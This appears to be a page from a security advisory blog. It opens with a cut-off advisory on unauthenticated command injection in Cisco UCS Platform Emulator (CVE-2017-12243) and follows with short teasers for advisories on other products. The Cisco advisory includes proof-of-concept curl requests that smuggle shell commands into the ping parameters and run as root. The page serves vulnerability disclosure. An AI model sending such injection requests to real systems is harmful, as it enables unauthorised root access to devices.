Remote Command Execution

SSD Advisory – Cisco UCS Platform Emulator Remote …

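Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities found in Cisco UCS Platform Emulator 3.1(2ePE1). Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled into a virtual machine (VM). The VM includes software that emulates hardware communications for the Cisco Unified Computing System (Cisco UCS) hardware that is configured and managed by Cisco UCS Manager. For example, you can use Cisco UCS Platform Emulator to create and test a supported Cisco UCS configuration, or to duplicate an existing Cisco UCS environment for troubleshooting or development purposes. The vulnerabilities found in Cisco UCS Platform Emulator are: an unauthenticated remote code execution vulnerability; an authenticated remote code execution vulnerability. An independent security researcher reported this vulnerability to Beyond Security's SSD.

Vendor Response
The vendor has released a patch for the vulnerability and issued the following CVE: CVE-2017-12243

Vulnerability Details
Unauthenticated remote code execution: user input passed to the IP/settings/ping function is not sufficiently filtered, so an unauthenticated attacker can inject commands through the ping_NUM and ping_IP_ADDR parameters. These commands are executed as root on the remote machine.

Proof of Concept
curl "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl -k "https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
curl -k "https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1"

After one of the above requests is sent, Cisco UCS responds as follows:
/sample output/
================
demo@kali:~/poc$ curl -k "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: …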


SSD Advisory – Cisco UCS Platform Emulator Remote Code Execution

Vulnerabilities Summary The following advisory describes two remote code execution vulnerabilities found in Cisco UCS Platform Emulator version 3.1(2ePE1). Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled into a virtual machine (VM). The VM includes software that emulates hardware communications for the Cisco Unified Computing System (Cisco UCS) hardware that is configured …


SSD Advisory – Endian Firewall Stored From XSS to Remote Command Execution

Vulnerability Summary The following advisory describes a stored cross site scripting that can be used to trigger remote code execution in Endian Firewall version 5.0.3. Endian Firewall is a “turnkey Linux security distribution, which is an independent, unified security management operating system. The Endian Firewall is based on a hardened Linux operating system.” Credit An …


SSD Advisory – Webmin Multiple Vulnerabilities

Vulnerability summary The following advisory describes three (3) vulnerabilities found in Webmin version 1.850. Webmin “is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets …


SSD Advisory – McAfee Security Scan Plus Remote Command Execution

Vulnerability Summary The following advisory describes a Remote Command Execution vulnerability found in McAfee Security Scan Plus version 3.11.587.1. McAfee Security Scan Plus is “a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open …


SSD Advisory – Vacron NVR Remote Command Execution

Vulnerability Summary The following advisory describes a remote command execution vulnerability. VACRON specializes in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other customized orders, the main products: driving recorder, CCTV analog monitoring system, CMS, IP Cam, etc.” Credit …


SSD Advisory – Netgear ReadyNAS Surveillance Unauthenticated Remote Command Execution

Vulnerability summary The following advisory describes an Unauthenticated Remote Command Execution vulnerability found in Netgear ReadyNAS Surveillance. Netgear ReadyNAS Surveillance – Small businesses and corporate branch offices require a secure way to protect physical assets, but often lack the security expertise or big budget that most solutions require. With these challenges in mind, NETGEAR introduces …


SSD Advisory – FLIR Systems Multiple Vulnerabilities

Vulnerabilities Summary The following advisory describes 5 (five) vulnerabilities found in FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID, PT-Series. FLIR – “Best-in-class thermal cameras with on-board analytics for high-performance intrusion detection. The new FC-Series ID combines best-in-class thermal image detail and high-performance edge perimeter analytics together in a single device that delivers optimal …


SSD Advisory – WiseGiga NAS Multiple Vulnerabilities

Vulnerabilities summary The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices. WiseGiga is a Korean company selling NAS products. The vulnerabilities found in WiseGiga NAS are: Pre-Authentication Local File Inclusion (4 different vulnerabilities); Post-Authentication Local File Inclusion; Remote Command Execution as root; Remote Command Execution as root …


SSD Advisory – Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities

Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in Mako Server’s tutorial page. The vulnerabilities found are: Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution; Unauthenticated File Disclosure; Unauthenticated Server Side Request Forgery. As these tutorials may be used as the basis for production code, it is important for users …


SSD Advisory – Remote Command Execution in Western Digital with Dropbox App

Vulnerability summary The following advisory describes an unauthenticated Remote Command Execution vulnerability in My Cloud products that have the Dropbox App installed. The My Passport, My Book, and My Cloud (Single-Bay) drives allow users to back up their data to an existing Dropbox account using WD SmartWare Pro, WD Backup. The My Cloud Dropbox App (Available …


SSD Advisory – D-Link 850L Multiple Vulnerabilities (Hack2Win Contest)

Vulnerabilities Summary The following advisory describes three (3) vulnerabilities found in the D-Link 850L router. The vulnerabilities were reported as part of the Hack2Win competition; for more information about Hack2Win, see https://blogs.securiteam.com/index.php/archives/3310. The vulnerabilities found in D-Link 850L are: Remote Command Execution via WAN and LAN; Remote Unauthenticated Information Disclosure via WAN and LAN …

